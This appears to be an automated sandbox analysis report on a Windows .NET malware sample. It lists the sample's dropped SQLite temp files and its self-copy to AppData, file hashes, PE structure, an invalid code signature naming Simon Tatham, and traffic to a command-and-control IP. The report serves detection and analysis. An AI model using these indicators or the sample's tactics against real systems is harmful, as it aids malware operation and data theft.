                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE0F8.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE1D8.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE1F8.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE209.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE20A.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE21A.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpE22B.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF353.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF364.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF375.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF385.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF396.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF3A6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\TmfmVKU.exe

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):730120
                      Entropy (8bit):7.907614712777529
                      Encrypted:false
                      SSDEEP:12288:vV9E8GILjWLWg/yvjaRBv5MIorus1IPI4AMqoYg/6vXdW1JeSel43qiukR:7cam5MI+TIPuM//CXd+JWl46i1
                      MD5:3599FA63D78413242A88966D3B4B14EF
                      SHA1:44526B00E847D9A16908C79F72DAB1AF4A2EDF29
                      SHA-256:C08FF513AD0787ED08C72BBDCDA0D166E603EA0736F5687B3DDDC0F4BB87DA33
                      SHA-512:E04604E58C9A0EB4E6BBEA99D59295463CB9058F82C2527502ACB6FE47989FC4F72B69338BB66CA5C5FC5A62D785FB65FCD4EB272A6136A1C240592076845D73
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 68%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............b.... ........@.. .......................@............@.....................................O........................6... ....................................................... ............... ..H............text...h.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................D.......H........... \......2...................................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....

                      C:\Users\user\AppData\Roaming\TmfmVKU.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.907614712777529
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      • Win32 Executable (generic) a (10002005/4) 49.93%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:lZ8NRWShfC.exe
                      File size:730'120 bytes
                      MD5:3599fa63d78413242a88966d3b4b14ef
                      SHA1:44526b00e847d9a16908c79f72dab1af4a2edf29
                      SHA256:c08ff513ad0787ed08c72bbdcda0d166e603ea0736f5687b3dddc0f4bb87da33
                      SHA512:e04604e58c9a0eb4e6bbea99d59295463cb9058f82c2527502acb6fe47989fc4f72b69338bb66ca5c5fc5a62d785fb65fcd4eb272a6136a1c240592076845d73
                      SSDEEP:12288:vV9E8GILjWLWg/yvjaRBv5MIorus1IPI4AMqoYg/6vXdW1JeSel43qiukR:7cam5MI+TIPuM//CXd+JWl46i1
                      TLSH:2EF40214B2594B99D26E5FFD0D90880557345B2B3320C3AE2FCC62DA9086B4EF74AD7B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............b.... ........@.. .......................@............@................................

                      File Icon

                      Icon Hash:3570b480858580c5

                      Static PE Info

                      General

                      Entrypoint:0x4aed62
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66820CA2 [Mon Jul 1 01:55:46 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Authenticode Signature

                      Signature Valid:false
                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                      Signature Validation Error:The digital signature of the object did not verify
                      Error Number:-2146869232
                      Not Before, Not After
                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                      Subject Chain
                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                      Version:3
                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                      Serial:7C1118CBBADC95DA3752C46E47A27438

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xaed100x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x1a90.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0xaee000x3608
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000xacd680xace0030df92c3807f7fe2ddefbf39c9e0418fFalse0.8020988679501084data7.914344938020503IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xb00000x1a900x1c0005420c9ddcef8354cee64a489e822c7eFalse0.7887834821428571data7.254229200237954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xb20000xc0x20090d29b59765d583d29f5a3290203b77bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xb01180x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.906800563777308
                      RT_GROUP_ICON0xb17440x14data0.9
                      RT_GROUP_ICON0xb17580x14data1.05
                      RT_VERSION0xb176c0x324data0.43656716417910446

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 3, 2024 18:17:17.742558956 CEST4973255615192.168.2.4185.222.58.91
                      Jul 3, 2024 18:17:17.747461081 CEST5561549732185.222.58.91192.168.2.4
                      Jul 3, 2024 18:17:17.747551918 CEST4973255615192.168.2.4185.222.58.91
                      Jul 3, 2024 18:17:17.773061037 CEST4973255615192.168.2.4185.222.58.91
                      Jul 3, 2024 18:17:17.777956009 CEST5561549732185.222.58.91192.168.2.4
                      Jul 3, 2024 18:17:18.131932020 CEST4973255615192.168.2.4185.222.58.91
                      Jul 3, 2024 18:17:18.136826038 CEST5561549732185.222.58.91192.168.2.4
